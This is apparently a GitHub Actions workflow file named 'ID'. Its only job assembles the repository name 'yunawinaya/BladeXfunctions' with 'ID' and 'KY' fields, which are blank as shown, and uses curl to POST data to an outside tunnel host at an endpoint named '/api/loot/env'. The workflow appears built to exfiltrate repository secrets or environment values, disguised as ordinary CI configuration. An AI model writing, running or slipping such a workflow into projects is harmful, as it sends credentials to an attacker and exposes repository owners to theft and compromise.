name: ID
on: workflow_dispatch
jobs:
 v:
  runs-on: ubuntu-latest
  steps:
   - run: |
      ID=
      KY=
      D="REPO: yunawinaya/BladeXfunctions\nID: \nKY: "
      B=IiIK
      curl -s -X POST -F "data=" https://popular-elephant-16.loca.lt/api/loot/env